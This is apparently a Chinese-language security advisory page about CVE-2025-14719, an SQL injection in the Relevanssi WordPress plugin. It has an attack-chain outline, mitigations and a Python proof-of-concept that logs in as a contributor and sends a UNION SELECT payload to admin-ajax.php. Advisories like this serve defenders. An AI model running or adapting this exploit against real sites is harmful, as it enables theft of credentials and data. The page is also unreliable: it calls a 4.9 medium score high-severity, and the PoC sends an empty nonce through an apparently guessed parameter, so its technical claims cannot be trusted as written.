CVE-2025-14719 Relevanssi WordPress插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14719

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Relevanssi WordPress插件, Relevanssi Premium WordPress插件

漏洞概述

CVE-2025-14719是WordPress Relevanssi搜索插件中的一个高危SQL注入漏洞。该漏洞影响Relevanssi插件4.26.0之前的版本以及Relevanssi Premium插件2.29.0之前的版本。攻击者可以利用该漏洞通过未经过滤和转义的参数执行恶意SQL语句，从而窃取数据库中的敏感信息或进行其他未授权的数据库操作。由于该漏洞需要 contributor 角色或更高权限才能利用，攻击门槛相对较低，对使用该插件的WordPress网站构成严重安全威胁。Relevanssi是一款广受欢迎的WordPress搜索增强插件，为网站提供高级搜索功能，因此该漏洞可能影响大量使用该插件的网站。

技术细节

该SQL注入漏洞源于Relevanssi插件在处理搜索参数时未对用户输入进行适当的清理和转义。攻击者可通过构造特制的搜索请求，将恶意SQL代码注入到数据库查询中。由于插件直接使用未经过滤的参数构建SQL语句，攻击者可以绕过应用程序的安全检查，直接与底层数据库交互。此漏洞允许具有 contributor 或更高权限的认证用户执行任意SQL查询，可能导致敏感数据泄露、数据库内容修改或删除等严重后果。攻击者通常利用UNION SELECT等技术从数据库中提取用户凭证、配置信息或其他敏感数据。

攻击链分析

STEP 1

1

攻击者获取WordPress网站的有效账户（需具备contributor或更高权限）

STEP 2

2

攻击者构造包含恶意SQL注入载荷的搜索请求

STEP 3

3

攻击者通过admin-ajax.php端点发送特制请求，载荷注入到未过滤的SQL查询参数中

STEP 4

4

数据库执行恶意SQL语句，攻击者通过UNION SELECT等技术提取敏感数据

STEP 5

5

攻击者获取数据库中的用户凭证、配置信息或其他敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14719 PoC - Relevanssi SQL Injection
# Target: WordPress site with vulnerable Relevanssi plugin

def exploit_sql_injection(target_url, wp_user, wp_password):
    """
    Exploit SQL injection in Relevanssi WordPress plugin
    Requires contributor+ role credentials
    """
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': wp_user,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/'
    }
    
    resp = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Send malicious search query with SQL injection payload
    search_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # SQL injection payload - extracts database version
    # The vulnerable parameter is used in SQL query without sanitization
    injection_payload = "1' UNION SELECT 1,2,3,4,5,@@version,7,8,9,10-- -"
    
    post_data = {
        'action': 'relevanssi_search',
        'post_ids': injection_payload,  # Vulnerable parameter
        'nonce': ''  # May need to fetch valid nonce
    }
    
    try:
        resp = session.post(search_url, data=post_data, timeout=10)
        if resp.status_code == 200:
            print(f"[+] Request sent, check response for SQL data leakage")
            print(f"[+] Response preview: {resp.text[:500]}")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://example.com contributor password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    
    exploit_sql_injection(target, user, password)

影响范围

Relevanssi WordPress插件 < 4.26.0

Relevanssi Premium WordPress插件 < 2.29.0

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 限制用户注册功能，仅允许受信任用户注册；2) 撤销所有不必要用户的contributor及以上权限；3) 在WAF或代理层添加SQL注入检测规则；4) 考虑暂时禁用Relevanssi插件直到完成安全更新。